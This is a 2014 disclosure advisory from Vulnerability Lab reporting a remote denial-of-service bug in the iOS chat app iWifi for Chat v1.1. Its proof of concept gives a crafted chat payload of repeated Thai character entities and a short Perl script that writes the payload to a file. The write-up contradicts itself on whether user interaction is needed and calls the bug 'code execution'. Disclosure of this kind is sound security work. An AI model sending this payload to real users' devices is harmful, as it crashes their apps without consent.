
Date: Tue, 16 Dec 2014 20:42:23 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: iWifi for Chat v1.1 iOS - Denial of Service Vulnerability

Document Title:
===============
iWifi for Chat v1.1 iOS - Denial of Service Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1375


Release Date:
=============
2014-12-16


Vulnerability Laboratory ID (VL-ID):
====================================
1376


Common Vulnerability Scoring System:
====================================
4.6


Product & Service Introduction:
===============================
iWifi for Chat lets you easily chat with your friends over Wifi in a fast and reliable way. 
The app is part of a bundle and is made by the seller ios developer.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/iwifi-for-chat/id512703175 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a remote denial of service vulnerability in the iWifi for Chat v1.1 iOS web-application.


Vulnerability Disclosure Timeline:
==================================
2014-12-16:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
iOS Developer
Product: iWifi for Chat - iOS Web Application 1.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A remote denial of service vulnerbaility has been discovered in the official iWifi for Chat v1.1 iOS web-application.
The vulnerbaility allows remote attackers to shutdown the service application by sending a special crafted chat message.

The vulnerability is located in the application message input context. Remote attackers are able to inject special chars 
to provoke an error that results in a app shutdown. The bug can be exploited by processing to send special crafted symbole 
messages through the context message input box. The vulnerability allows an attacker to crash the connected remote ios client.

The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring 
system) count of 4.6. Exploitation of the DoS vulnerability requires no privileged application user account but a connected 
chat user for interaction. Successful exploitation of the code execution vulnerability results in mobile application compromise 
and affected or connected device component compromise.

Vulnerable Module(s):
				[+] Chat Message Input Box

Vulnerable Parameter(s):
				[+] message context

Affected Module(s):
				[+] iWifi for Chat v1.1


Proof of Concept (PoC):
=======================
The Vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For security demonstration or to reporduce the vulnerability follow the provided information and steps below to continue.


PoC: 1024 bytes - message context payload

&#3655;¬&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655; -&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;-&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; &#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; ¬&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655; &#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;-&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; ¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;¬¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;
&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655; &#3655;¬&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655; -&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;-&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; &#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; ¬&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655; &#3655;&#3655;&#3655;&#3655;¬&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655; -&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;


PoC: Exploit

#!/usr/local/bin/perl
 open (MYFILE, '>>exploitcode.txt');
 print MYFILE "&#3655;¬&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655; -&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;-&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; &#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; ¬&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655; &#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;-&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; ¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;¬¬
&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655; &#3655;¬&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655; -&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;-&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; &#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655; ¬&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;¬&#3655;&#3655;&#3655;&#3655; &#3655;&#3655;&#3655;&#3655;¬&#3655;&#3626;&#3655;&#3655;&#3655;&#3655;&#3655; -&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3626;&#3655;¬&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;&#3655;\n";
 close (MYFILE); 


Security Risk:
==============
The security risk of the of the denial of service web vulnerability is estimated as medium. (CVSS 4.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@...lution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 	       		- admin@...lution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt



